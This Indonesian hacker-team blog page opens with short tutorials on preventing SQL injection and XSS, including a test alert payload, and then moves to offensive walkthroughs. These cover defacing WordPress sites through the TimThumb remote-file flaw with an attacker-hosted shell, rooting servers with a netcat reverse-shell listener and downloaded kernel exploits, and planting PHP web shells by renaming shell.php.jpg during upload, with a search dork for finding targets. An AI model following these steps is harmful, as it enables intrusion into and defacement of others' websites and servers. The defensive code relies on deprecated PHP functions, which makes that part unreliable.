Advertisement
Advertisement
Advertisement

Search

Ingat Kami Disini Hanya Memberi Pengetahuan dan tidak lebih .. Silahkan menggunakan Pengetahuan tersebut dengan bijak,dan kami tidak bertanggung jawab atas apapun yang terjadi! - by CEO,Admin,Author IHC-Team
TEAM KAMI SUDAH BUBAR SEJAK 2016 best Regard AnonGhost.ID | INDONESIA HACKER CYBER TEAM

Mencegah Website dari serangan SQL Injection & XSS

1 . Mencegah web dari SQL injection

SQL Injection
? Apa itu? Ya, beberapa dari kita para developer web sudah mendengar hal ini, bahkan seorang yang bukan developer web pun juga mengetahuinya. SQL Injection merupakan salah satu teknik serangan terhadap sebuah situs atau website. Serangan ini memanfaatkan kesalahan perintah SQL yang dikirimkan dari web ke database server untuk dieksekusi oleh databaseserver. 


Pada umumnya sintak SQL yang sering dipakai pada proses developing atau pembuatan sebuah situs iyalah sintak DML(Data Manipualtion Language) yakni INSERT, UPDATE dan DELETE. Pada umumnya sintak yang dikirim seperti ini 


select * from `tblBerita` where `id` = 10
10 didapat dari hasil parsing parameter url
http://www.website.com/index.php?id=10
 
 
maka pada penulisan sintak php akan menjadi seperti ini


$SQL="select * from `tblBerita` where `id` = '".$_GET['id']."'";
pada proses eksekusi normal sintak tersebut, database server akan memberikan balikan hasil sesuai yang parameter yang dikirimkan. Namun bila kita meracuni parameter yang dikirim melalu url dengan sebuah karakter khusus yaitu single quote ( ' ) seperti ini 

http://www.website.com/index.php?id=10'
maka SQL query tersebut tidak akan bisa di eksekusi dan database server akan memberikan balikan berupa pesan error seperti berikut

 #1064 - You have an error in your SQL syntax; check the manual that corresponds 
to yourMySQL server version for the right syntax to use near ''' at line 1
mengapa? karena SQL yang dikirimkan ke database adalah seperti ini 


select * from `tblBerita` where `id` ='10''
perhatikan setelah nilai 10 terdapat dua buah single quote. Hal ini lah yang menyebabkan error, dan hal ini lah yang mejadi celah sebuah situs dan dengan mudah di eksploitasi dengan metode SQL Injection. 

Nah, bagaimana kita mengatasi hal ini? Ya, caranya adalah dengan melakukan sanitasi pada data yang dikirimkan dari url. 

PHP sendiri telah menyediakan method khusus untuk menangani hal ini, yaitu mysql_real_escape atau mysql_real_escape_stringNamun kita juga bisa membuat sebuah method khusus untuk mengerjakan hal ini, yang penting tujuannya adalah untuk sanitasi data yang dikirimkan.

Saat penggunakan method itu maka sintak pengiriman SQL Query ke database server akan menjadi seperti ini

$SQL="select * from `tblBerita` where `id` = '".mysql_real_escape_string($_GET['id'])."'";
dan querynya akan mejadi seperti ini bila ada penambahan single quote pada url

select * from `tblBerita` where `id`='10'\'
dengan demikian, database hanya akan membaca 1 singel quote didepan angka 10 dan 1 single quote dibelakang angka 10, sedangkan 1 karakter single quote tambahan dibelakang angka 10 akan terabaikan karena adanya karakter back slash ( \ )
Demikianlah tutorial singkat dari saya mengenai Proteksi Website dari Serangan SQL Injection.
regards

2 . Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah “Startup and run SQL Server” menggunakan low privilege user di SQL Server Security tab.


3 Cara Mengatasi Serangan XSS

XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

Dikutip dari Wikipedia


Disini saya hanya menerangkan tempat dimana XSS dapat dilakukan

XSS yang paling banyak digunakan adalah jenis GET dan POST.
Salah satu contoh yang akan dibahas adalah jenis GET.

Lihat gambar dibawah ini :
image
Masukkan script alert sederhana ini pada URL yang mempunyai request GET
http://localhost/Momonimo/search?search_key=<script>alert('XSS TRUE')</script>

Jika halaman tersebut (yang mempunyai database) dapat melakukan XSS, maka akan tampil alert seperti gambar sebagai berikut :
image


Mengatasi XSS
---------------------------------------------------
PHP sangat handal dalam melakukan konversi string dengan cepat. Tetapi jenis apa yang akan anda lakukan jika hal diatas terjadi?

Saya melakukan survey terhadap teman-teman programmer.
Tidak sedikit yang menjawab "Pakai saja htmlentities() atau strip_tags()"

htmlentities() memang dapat melakukan konversi tag-tag HTML, tetapi bagaimana dengan Javascript?

strip_tags() memang dapat melakukan konversi tag-tag HTML dan PHP dengan NULL byte, tetapi bagaimana dengan Javascript?

Lalu apa yang harus dilakukan?
Saya memakai filter_var() dengan tipe filter Sanitize
Caranya sebagai berikut :

filter_var($val, FILTER_SANITIZE_STRING);

Dan hasilnya adalah :
image

Berikut adalah Fungsi untuk keseluruhannya :

function xss_filter($val) {
 $val = htmlentities($val); 
 $val = strip_tags($val);
 $val  = filter_var($val, FILTER_SANITIZE_STRING);
 
 return $val;
}


Saya membuat Fungsi diatas (dengan menambahkan htmlentities dan strip_tags) agar XSS key yang digunakan dapat terbaca semua. Semata-mata hanya ingin membuat rasa penasaran para hacker

Tutorial Deface Dengan TimThumb 1.14

Okeh sebelum belajar exploit ini saya mau ngejelasin bahwa timthumb ini adalah suatu bug dimana terdapat di semua website wordpress , lebih tepatnya terdapat pada " theme / tema " suatu website ,,,
Contoh : themes/optimizepress/timthumb.php < nah kalo ada bacaan seperti "

 
no image specified
Query String : 
TimThumb version : 1.19 
 
berarti vuln ;) ,, nah yang harus kamu ketahui lagi itu adalah TimThumb version . 
Nah jadi target yang bisa kita exploitasi itu timthumb version 1.14 sampai dengan 
1.32 ,, Udah ngerti kan ? :) kalo belum ngerti liat aja tutorialnya :) ,, Yuk TKP .. 
 
Alat dan Bahan : 
1. Subdomain yang terintegrasi website berikut 
   : picasa.com
   : blogger.com
   : flixr.com 
 
sebenarnya ada 5 tapi aku gk hafal U,u ,, contoh " flxr.com.namawebsitekamu.com/shell.php "
, Nah sebelumnya kamu musti upload dulu shell di subdomain kamu yang letaknya di directory
public_html / httpdocs / www / dan macam² .. 
  
2. Otak dan pantang menyerah ;) .. 

Exploit : 
1. Kali ini saya dah punya target sendiri ,, lihat gambar .. 
2. Nah kemudian kalian tambahkan subdomain kalian di ahkir url seperti ini " ?src=http://www.flixr.com.subdomainkamu.com/shell.php " < begitu mas ;) ,, kurang jelas ? lihat gambar .. 
3. Tuh liat gambarnya kalo gitu dah " Game Over " namanya ;) .. tinggal buka shellnya aja kan di situ ada tulisan " Unable to open image :" kalo gitu skrng tinggal buka shellnya , caranya copy md5 yang tadi contoh :

" /cache/c89de71219ef668b7642e43e04d5d4df.php " masih kurang jelas ? liat gambar ..
4. Nah skrng kita copas ke urlnya jadi " http://namatarget.com/wp-content/themes/optimizepress/cache/c89de71219ef668b7642e43e04d5d4df.php "  , lihat di bawah ,,

5. Selesai deh :D ,,, nah itu kalo ane gk upload shell di subdomainnya tapi upload uploader aja jadi ky gitu ,,
hehe sory yak uploadernya punya pak deb~X ,,

Source : Extreme Crew

Tutorial R00t Server

Bahan - Bahan :

- VPS
- Putty For Windows
- Web Yang Sudah Tertanam Shell
- Exploit Kernel :D


Langkah - Langkah :

1.Backconnect dulu untuk tutor backconnect bisa di tonton > disini <




2.Setelah Di Backconnect Akan Keluar Kernelnya Lalu Kita Search google
  ~> Exploit Kernel [kernel web] contoh :
  ~> Exploit Kernel 2.6.32




3.Setelah Menemukan Upload Exploit Ke Web


4.Kita Kembali Ke putty Lagi Ganti chmodnya menjadi 777 dengan cara :
  ~> "chmod +x namafile"
  ~> "chmod 777 namafile"



5.Tinggal Kita Excute dengan cara "./namafile" Contoh "./xxx"



6.Coba Ketik id Jika Keluar
  ~> uid=0(root) gid=0(root) groups=0(root) Berarti Succes Jika Error Berarti Kernel Kurang        Pas :D


Gak mudeng? langsung tonton videonya 

tutorial Backconnect

Backconnect Adalah Teknik Awal Untuk rooting Server
Bahan-Bahan :

-VPS (Kalo Gk Punya Duit Bisa Cari Yang Trial )
-Putty (Download Disini )
-Shell Yang Sudah Tertanam Di Web

Langkah-Langkah

1).Buka Putty Lalu Masukan IP VPS Kamu Trus Klik Open



2).Lalu masukan User Dan Password VPS Kalo Succes Login Akan Seperti Ini 


3).Sekarang Kita Masukaan Command nc -lvp [port] contoh ; nc -lvp 2802 Saya Sarankan Menggunakan port 443 Lalu Tekan Enter


4).Lalu Kita Ke Shell Dan Masukan IP VPS Trus Port Lalu Klik Connect 

5).Kalo Sudah Connect Akan Seperti Ini Sekarng Terserh Mau Di Apain

Cara Deface web iklan by -Mr.HaurgeulisX196-



Alat yang di butuhkan hanya pake Live HTTP Headers download DISINI atau bisa pake DISINI 
Dork : intext:pasang iklan gratis ( use your brain :D )
siap kan shell lalu rename menjadi jpg
contoh shell.php.jpg

cari web lalu exploit / tambahkan /banner/pasang
misal www.site.com/banner/pasang


jika sudah ketemu masuk ke pasang iklan banner
lalu isi data asala aja
di kolom form upload kamu masukan shell kamu yang sudah di rename tadi


submit iklan nya lalu nanti akan tampil menu tamper2 nah kamu tamper data nya
cari nama shell.php.jpg lalu kamu rename kembali menjadi shell.php 






dan taraaaaaaaa shell kamu dah masuk ke web tersebut defaul nya ada di target.com/images/bnrs/(namashell).php tapi tergantung setelen web nya juga ..




Selanjutnya terserah anda mau di apain..  


Sumber  :  -Mr.HaurgeulisX196-

Cara ( Upload file PHP ) dengan Tamper Data

Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang jadi pertanyaan kalau web target hanya mendukung file.jpg untuk di upload gimana ? Nah itu yang akan saya sharing tekhniknya. Tahap-tahapnya seperti berikut ini. Tapi dengan catatan anda telah menguasai website target dengan tekhnik : sql injection , LFI / RFI , atau exploit.
1. Siapkan dulu file shell.php seperti : C99Shell, r57, atau lainya cari aja di google banyak :D
2. Rename dengan nama : shell.php.jpg
3. Install add ons Tamper Data dulu di browser mozilla kita, Download disini :D
4. Restart dan kita mulai upload
5. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan



6. Trus Uploads shell.php.jpg kita dan tamper :D


7. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan rename path shell.php.jpg menjadi shell.php ! ingat yah :D


Sekarang anda tinggal cari dimana file shell anda berada .
Dan buka path shell.php anda di url browser dan siap meluncur ke TKP. Tapi inget, gak semua web target bisa kita lakukan dengan tekhnik ini

Visitor

hit counter